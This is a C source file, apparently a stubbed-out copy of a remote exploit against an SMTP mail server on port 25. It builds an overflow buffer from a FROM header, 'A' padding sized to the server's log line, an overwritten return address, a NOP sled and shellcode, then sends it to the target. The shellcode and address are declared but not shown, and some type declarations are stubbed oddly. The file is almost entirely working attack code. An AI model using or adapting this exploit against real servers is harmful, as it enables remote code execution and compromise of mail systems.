
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






struct sockaddr_in {int sin_port; int sin_addr; int sin_family; } ;
struct sockaddr {int dummy; } ;
typedef int msg ;
typedef int conn ;


 int AF_INET ;
 char* FROM ;
 int PF_INET ;
 unsigned long RET ;
 int SOCK_STREAM ;
 int bzero (char*,int) ;
 int close (int) ;
 scalar_t__ connect (int,struct sockaddr*,int) ;
 int exit (int) ;
 int fprintf (int ,char*,char*) ;
 int free (char*) ;
 int getsockname (int,struct sockaddr*,int*) ;
 int htons (int) ;
 int inet_aton (char*,int *) ;
 int inet_ntoa (int ) ;
 int ntohs (int ) ;
 char* shellcode ;
 int snprintf (char*,int,char*,char*,int,char*,int) ;
 int socket (int ,int ,int ) ;
 int stderr ;
 char* strdup (int ) ;
 int strlen (char*) ;
 scalar_t__ write (int,char*,int) ;

int main( int argc, char * argv[] )
{
 int sock_client;
 struct sockaddr_in addr_server, addr_client;
 int i, j;
 char * ip_src, * ip_dst;
 char conn[ 256 ], msg[ 1500 ];

 if ( argc != 2 )
 {
  fprintf( stderr, "Usage: %s IP\n", argv[0] );
  exit( -1 );
 }

 if ( (sock_client = socket(PF_INET, SOCK_STREAM, 0)) < 0 )
 {
  exit( -1 );
 }

 bzero( (void *)&addr_server, sizeof(struct sockaddr_in) );
 addr_server.sin_family = AF_INET;
 addr_server.sin_port = htons( 25 );
 inet_aton( argv[1], &addr_server.sin_addr );

 if ( connect(sock_client, (struct sockaddr *)&addr_server, sizeof(struct sockaddr_in)) < 0 )
 {
  exit( -1 );
 }

 i = sizeof( struct sockaddr );
 getsockname( sock_client, (struct sockaddr *)&addr_client, &i );

 ip_src = strdup( inet_ntoa(addr_client.sin_addr) );
 ip_dst = strdup( inet_ntoa(addr_server.sin_addr) );
 snprintf( conn, sizeof(conn), "%s.%u-%s.%u", ip_src, ntohs(addr_client.sin_port), ip_dst, ntohs(addr_server.sin_port) );
 free( ip_src );
 free( ip_dst );

 bzero( msg, sizeof(msg) );
 i = 0;
 for ( j = 0; j < strlen(FROM); i++, j++ )
 {
  msg[ i ] = FROM[ j ];
 }
 for ( j = 0; j < 256 - strlen(conn) - strlen(": mail [") - strlen(FROM); i++, j++ )
 {
  msg[ i ] = 'A';
 }
 *((unsigned long *)(&(msg[i]))) = RET;
 i += 4;
 for ( j = 0; j < 1024; i++, j++ )
 {
  msg[ i ] = 0x90;
 }
 for ( j = 0; j < strlen(shellcode); i++, j++ )
 {
  msg[ i ] = shellcode[ j ];
 }

 if ( write(sock_client, msg, strlen(msg)) < 0 )
 {
  exit( -1 );
 }

 close( sock_client );

 exit( 0 );
}
